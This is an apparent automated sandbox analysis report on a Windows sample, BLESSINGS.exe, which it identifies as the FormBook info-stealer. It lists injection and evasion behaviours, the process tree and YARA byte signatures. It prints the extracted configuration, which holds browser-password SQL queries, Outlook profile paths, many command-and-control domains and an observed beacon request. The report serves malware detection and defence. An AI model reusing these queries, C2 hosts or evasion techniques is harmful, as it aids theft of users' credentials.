Analysis Report BLESSINGS.exe

Overview

General Information

Sample Name:BLESSINGS.exe
Analysis ID:339345
MD5:30cb872994e8a0a4a635b06bfbe38006
SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • BLESSINGS.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\BLESSINGS.exe' MD5: 30CB872994E8A0A4A635B06BFBE38006)
    • AddInProcess32.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6784 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", 
"eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
8.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.2.AddInProcess32.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.AddInProcess32.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 8.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (see the full configuration dump under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: BLESSINGS.exe | Virustotal: Detection: 45%
Source: BLESSINGS.exe | ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match | File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: BLESSINGS.exe | Joe Sandbox ML: detected
Source: 8.2.AddInProcess32.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: BLESSINGS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: BLESSINGS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: AddInProcess32.pdb | source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: AddInProcess32.exe, raserver.exe
Source: Binary string: RAServer.pdb | source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
Source: Binary string: AddInProcess32.pdbpw | source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
Source: Binary string: RAServer.pdbGCTL | source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\BLESSINGS.exe | Code function: 4x nop then jmp 0117F696h | 1_2_0117EEC2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi | 8_2_00416BF3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi | 8_2_00416C07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi | 8_2_00416C27
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi | 8_2_00416C3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 4x nop then pop edi | 8_2_00417D68
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 15_2_001E6BF3
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 15_2_001E6C07
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 15_2_001E6C3F
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 15_2_001E6C27
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi | 15_2_001E7D68
Source: global traffic | HTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1 | Host: www.quintred.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 91.195.241.137 91.195.241.137
Source: Joe Sandbox View | ASN Name: SEDO-ASDE SEDO-ASDE
Source: global traffic | HTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1 | Host: www.quintred.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.toweroflifeinc.com
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: BLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.com/jqc/www.sterlworldshop.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.asacal.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.asacal.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.asacal.com/jqc/:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.asacal.comReferer:
Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.cositasdepachecos.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.cositasdepachecos.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.cositasdepachecos.com/jqc/www.margosbest.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.cositasdepachecos.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.droriginals.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.droriginals.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.droriginals.com/jqc/www.kornteengoods.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.droriginals.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gabriellagullberg.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gabriellagullberg.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gabriellagullberg.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.hotvidzhub.download
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.hotvidzhub.download/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.hotvidzhub.download/jqc/www.internetmarkaching.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.hotvidzhub.downloadReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.kornteengoods.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.kornteengoods.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.kornteengoods.com/jqc/www.screwtaped.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.kornteengoods.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.margosbest.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.margosbest.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.margosbest.com/jqc/www.the343radio.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.margosbest.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.novergi.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.novergi.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.novergi.com/jqc/www.hotvidzhub.download
